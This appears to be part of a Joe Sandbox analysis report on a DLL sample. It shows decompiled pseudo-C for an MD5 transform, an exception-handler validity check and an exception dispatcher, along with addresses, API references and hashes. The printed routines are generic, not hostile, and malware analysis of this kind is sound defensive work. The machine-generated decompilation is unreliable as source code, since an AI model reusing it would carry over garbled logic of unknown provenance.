				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x007d73de
0x007d73e9
0x007d73ec
0x007d73ef
0x007d73f0
0x007d73f0
0x007d73fb
0x007d740c
0x007d740e
0x007d7411
0x007d7411
0x007d7414
0x007d7414
0x007d7417
0x007d7417
0x007d741a
0x007d741a
0x007d7437
0x007d743a
0x007d7450
0x007d7453
0x007d746d
0x007d7470
0x007d7486
0x007d7489
0x007d748b
0x007d74a3
0x007d74a6
0x007d74a9
0x007d74c1
0x007d74c4
0x007d74de
0x007d74e1
0x007d74f7
0x007d74fa
0x007d74fc
0x007d7514
0x007d7519
0x007d751c
0x007d7532
0x007d7535
0x007d754f
0x007d7552
0x007d7568
0x007d756b
0x007d756d
0x007d7588
0x007d758b
0x007d75a2
0x007d75a5
0x007d75a9
0x007d75c2
0x007d75c5
0x007d75c7
0x007d75ca
0x007d75e5
0x007d75e8
0x007d7601
0x007d7604
0x007d7614
0x007d7617
0x007d762f
0x007d7632
0x007d764c
0x007d764f
0x007d7667
0x007d766a
0x007d7680
0x007d7683
0x007d769b
0x007d769e
0x007d76b6
0x007d76b9
0x007d76d3
0x007d76d6
0x007d76ec
0x007d76ef
0x007d7707
0x007d770a
0x007d7724
0x007d7727
0x007d773f
0x007d7742
0x007d7758
0x007d775b
0x007d7773
0x007d7776
0x007d778e
0x007d7791
0x007d77a3
0x007d77a6
0x007d77b8
0x007d77bb
0x007d77cd
0x007d77d0
0x007d77d4
0x007d77e4
0x007d77e7
0x007d77f5
0x007d77f8
0x007d780a
0x007d780d
0x007d7821
0x007d7824
0x007d7826
0x007d7836
0x007d7839
0x007d784b
0x007d784e
0x007d785c
0x007d785f
0x007d7871
0x007d7874
0x007d7878
0x007d7888
0x007d788b
0x007d789d
0x007d78a0
0x007d78ae
0x007d78b1
0x007d78c3
0x007d78c6
0x007d78d8
0x007d78db
0x007d78ef
0x007d78f2
0x007d7906
0x007d7909
0x007d791d
0x007d7920
0x007d7934
0x007d7937
0x007d794b
0x007d794e
0x007d7962
0x007d7967
0x007d7979
0x007d797c
0x007d7990
0x007d7993
0x007d79a7
0x007d79aa
0x007d79c0
0x007d79c3
0x007d79d7
0x007d79da
0x007d79ec
0x007d79ef
0x007d7a03
0x007d7a06
0x007d7a1a
0x007d7a1d
0x007d7a31
0x007d7a3a
0x007d7a3d
0x007d7a46
0x007d7a4f
0x007d7a57
0x007d7a5f
0x007d7a69
0x007d7a7e

APIs

memset.NTDLL ref: 007D7A72

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 7b91dd996ac38d978c68f05a249bc6d12301e66ea3ca414a299c22598d58ea8f
Instruction ID: 3c5f5f6c216fd27e8a115492880583aaa2c4532cade0fbe766e0c54cf9f46ef6
Opcode Fuzzy Hash: 7b91dd996ac38d978c68f05a249bc6d12301e66ea3ca414a299c22598d58ea8f
Instruction Fuzzy Hash: 6122847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 007DB2E1, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007DB2E1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x7dd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x7dd328 = 1;
										__eflags =  *0x7dd328;
										if( *0x7dd328 != 0) {
											goto L60;
										}
										_t84 =  *0x7dd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x7dd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x7dd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x7dd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x7dd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x7dd328 = 1;
							__eflags =  *0x7dd328;
							if( *0x7dd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x7dd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x7dd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x7dd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x7dd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x007db2eb
0x007db2ee
0x007db2f4
0x007db312
0x00000000
0x007db312
0x007db2fc
0x007db305
0x007db30b
0x007db31a
0x007db31d
0x007db320
0x007db32a
0x007db32a
0x007db32c
0x007db32f
0x007db331
0x007db331
0x007db333
0x007db336
0x00000000
0x00000000
0x007db338
0x007db33a
0x007db3a0
0x007db3a0
0x007db4fe
0x00000000
0x007db4fe
0x007db33c
0x007db33c
0x007db340
0x007db342
0x007db342
0x007db342
0x007db342
0x007db345
0x007db346
0x007db349
0x007db349
0x007db34d
0x007db351
0x007db35f
0x007db35f
0x007db367
0x007db36d
0x007db36f
0x007db371
0x007db381
0x007db38e
0x007db392
0x007db397
0x007db399
0x007db417
0x007db417
0x007db39b
0x007db39b
0x007db39b
0x007db419
0x007db41b
0x007db4fc
0x007db4fc
0x00000000
0x007db421
0x007db421
0x007db428
0x00000000
0x00000000
0x007db42e
0x007db432
0x007db48e
0x007db490
0x007db498
0x007db49a
0x007db49c
0x00000000
0x00000000
0x007db49e
0x007db4a4
0x007db4a6
0x007db4a8
0x007db4bd
0x007db4bd
0x007db4bf
0x007db4ee
0x007db4f5
0x00000000
0x007db4f5
0x007db4c3
0x007db4c4
0x007db4c6
0x007db4c8
0x007db4c8
0x007db4ca
0x007db4cc
0x007db4ce
0x007db4e2
0x007db4e2
0x007db4e5
0x007db4e7
0x007db4e7
0x007db4e8
0x007db4e8
0x00000000
0x007db4d0
0x007db4d0
0x007db4d0
0x007db4d9
0x007db4da
0x007db4dc
0x007db4de
0x007db4de
0x00000000
0x007db4d0
0x007db4ce
0x007db4aa
0x007db4b1
0x007db4b1
0x007db4b3
0x00000000
0x00000000
0x007db4b5
0x007db4b6
0x007db4b9
0x007db4bb
0x00000000
0x00000000
0x00000000
0x007db4bb
0x00000000
0x007db4b1
0x007db434
0x007db437
0x007db43c
0x00000000
0x00000000
0x007db445
0x007db447
0x007db44d
0x00000000
0x00000000
0x007db453
0x007db459
0x00000000
0x00000000
0x007db45f
0x007db461
0x007db46a
0x007db46e
0x00000000
0x00000000
0x007db474
0x007db477
0x007db479
0x00000000
0x00000000
0x007db480
0x007db482
0x00000000
0x00000000
0x007db484
0x007db488
0x00000000
0x00000000
0x00000000
0x007db488
0x00000000
0x00000000
0x00000000
0x007db373
0x007db373
0x007db373
0x007db37a
0x00000000
0x00000000
0x007db37c
0x007db37d
0x007db37f
0x00000000
0x00000000
0x00000000
0x007db37f
0x007db3a7
0x007db3a9
0x00000000
0x00000000
0x007db3b9
0x007db3bb
0x007db3bd
0x00000000
0x00000000
0x007db3c3
0x007db3ca
0x007db3f6
0x007db3f6
0x007db3f8
0x007db3fa
0x007db40e
0x007db410
0x00000000
0x00000000
0x00000000
0x00000000
0x007db3fc
0x007db3fc
0x007db3fc
0x007db405
0x007db406
0x007db408
0x007db40a
0x007db40a
0x00000000
0x007db3fc
0x007db3cc
0x007db3cc
0x007db3cf
0x007db3d1
0x007db3e3
0x007db3e3
0x007db3e6
0x007db3e8
0x007db3e8
0x007db3e9
0x007db3e9
0x007db3ef
0x007db3ef
0x00000000
0x00000000
0x00000000
0x00000000
0x007db3d3
0x007db3d3
0x007db3d3
0x007db3da
0x00000000
0x00000000
0x007db3dc
0x007db3dc
0x007db3dd
0x00000000
0x00000000
0x00000000
0x007db3dd
0x007db3df
0x007db3e1
0x007db3f4
0x00000000
0x00000000
0x00000000
0x007db3f4
0x00000000
0x007db3e1
0x007db353
0x007db356
0x007db359
0x00000000
0x00000000
0x007db35b
0x007db35d
0x00000000
0x00000000
0x00000000
0x007db35d
0x007db322
0x007db324
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 007DB392

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 873f838d7d0c6f984f99782b75f1feaacca038899d794b6c642a105fdf16e644
Instruction ID: 1802d10fd8bc60ded1f2583200e2e491a1f0d9c36fc4d00ee07e96fdd73a3313
Opcode Fuzzy Hash: 873f838d7d0c6f984f99782b75f1feaacca038899d794b6c642a105fdf16e644
Instruction Fuzzy Hash: F861B030A00646DBDB29CF29C99063A73B5FB89354B6A817BD846C7392E73CEC42D744

Uniqueness

Uniqueness Score: -1.00%

Function 007DB0BC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E007DB0BC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E007DB227(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E007DB2E1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E007DB1CC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E007DB227(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E007DB2C3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x007db0c0
0x007db0c1
0x007db0c2
0x007db0c5
0x007db0c7
0x007db0ca
0x007db0cb
0x007db0cd
0x007db0ce
0x007db0cf
0x007db0d2
0x007db0dc
0x007db18d
0x007db194
0x007db19d
0x007db0e2
0x007db0e2
0x007db0e8
0x007db0ee
0x007db0f1
0x007db0f4
0x007db0f8
0x007db0fd
0x007db102
0x007db182
0x00000000
0x007db104
0x007db104
0x007db110
0x007db112
0x007db16d
0x007db16d
0x007db173
0x00000000
0x007db114
0x007db123
0x007db125
0x007db126
0x007db127
0x007db12a
0x007db12a
0x007db12c
0x00000000
0x007db12e
0x007db12e
0x007db178
0x007db130
0x007db130
0x007db134
0x007db13c
0x007db141
0x007db146
0x007db152
0x007db15a
0x007db161
0x007db167
0x007db16b
0x00000000
0x007db16b
0x007db12e
0x007db12c
0x00000000
0x007db112
0x007db186
0x007db186
0x007db186
